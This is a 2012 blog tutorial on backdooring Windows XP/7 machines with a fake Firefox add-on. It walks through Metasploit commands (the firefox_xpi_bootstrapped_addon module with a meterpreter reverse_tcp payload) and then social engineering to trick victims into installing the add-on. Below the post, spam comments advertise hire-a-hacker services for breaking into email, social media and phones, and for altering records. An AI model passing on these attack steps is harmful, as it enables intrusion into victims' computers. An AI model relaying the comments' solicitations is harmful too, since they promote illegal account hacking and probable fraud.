Thursday, June 14, 2012

Hacking Windows 7 & Xp with Fake Firefox add-on (XPI) : Metasploit Tutorials



>What am i doing?
1. Create a fake firefox extension with Metasploit that creates a backdoor from the victim system.
2. Trick users into installing the add-on
3. Break into the Target Machine.

>Pre-configuration:
*. As usual, you have to set up two virutal machines(VM ) in your virtualbox namely "Target"and "Attacker".
*. Install the windows xp or 7 in the Target VM.
*. Install the Backtrack in the Attacker VM.

>Part I: Update the Metasploit-

As we are going to use the latest module, you are advised to update the Metasploit modules. Don't know how to do this? No need to worry!
*. Open the Terminal
*. type msfupdate
*. This will update the Metasploit with latest modules..

>Part II: Configuring settings in Metasploit for the fake-addon exploit-

*Step 1:
Open the Terminal and type " msfconsole " to get the Metasploit console.
*Step 2:
Type " use exploit/multi/browser/firefox_xpi_bootstrapped_addon " in the console.
*Step 3:
Now we have to know the list of settings available for this exploit module. In order to get the list, you can type "show options" in the console.

*Step 4: Configurations-

Let us configure the setting for the exploit.
type the commands..

Command: set addonname fake

Details: Name for the fake add-on. you can change the "fake" to any name.

Command: set SRVHOST 192.168.56.11

Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the "ifconfig" in the terminal.

Command: set SRVPORT 80

Details: Our server is going to be accessed via the port 80(default port)

Command: set URIPATH fakeEx

Details: The path in which the fake add-on will be available to download. For ex: http://192.1xx.5x.xx/fakeaddon

Command: set LHOST 192.168.56.11

Details: Here the 192.168.56.11 is the ip of Backtrack. You can get this ip by simply typing the "ifconfig" in the terminal.

>Step 5: Payload-

As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console:

set payload windows/meterpreter/reverse_tcp

>Part III: Social Engineering Attack-

Successfully configured the settings for the exploit, what else? let us launch the exploit.

Type "exploit" in the console.
Now the exploit is started. Our fake add-on is available at,"http://192.1xx.5x.xx/fakeaddon".

Once victim visit the link, it will ask user to install the add-on in order to view the page. Once user install the add-on, the system will be backdoor-ed.

Now , You can control the victim system from meterpreter..

4 comments:

Anonymous said...


WORLD CLASS PEDIGREE HACKERS
times come when one seriously and urgently needs the services of a world class pedigree hacker
our research showed more than 70% end up in the hands of scammers,
25% gets tired of the search and give up while just less than 2% truely meet REAL HACKERS..
visit the link below would be of help to you....
hireverifiedhacker.wordpress.com/hire-a-hacker/

Anonymous said...



In order to get a good and reliable hacker, it is advised you know first HOW TO HIRE A HACKER and how to know the hacker you should go for
hireverifiedhacker.wordpress.com

jamie said...

They are all scammers, they will make you pay after which they will give you an excuse asking you to pay more money, they have ripped me of $2000, i promised i was going to expose them.
I figured it all out when my colleague took me to Pavel

(HACKINTECHNOLOGY@GMAIL.COM)
CELL PHONE +16692252253

He did perfect job, he hacks all accounts ranging from (Emails, Facebook, whatsapp, imo, skype, instagram, Phone cloning, DMV removal, tracking locations, background checks Kik etc. he also hacks cell phones, cell phone tapping and cloning, clears bad driving and criminal records, bank transfers, locates missing individuals e.t.c. You should contact him and please stop using contacts you see on websites to execute jobs for you, you can ask around to find a real hacker.

jane holly said...

My life was falling apart, I was being cheated and abused, I had to know the truth and needed proof. I contacted a private investigator that linked me with onlineghost who took care of the hack job. He hacked his iPhone,Facebook,Instagram, Whats app, twitter and email account. I got all I wanted as proof . I”m glad i had a proven truth he was cheating . Contact him for any hack job. Tell him i referred you to him, he will surely meet your hack need. Contact: onlineghosthacker247@ gmail .com

Post a Comment

 
Design by Secure Hackers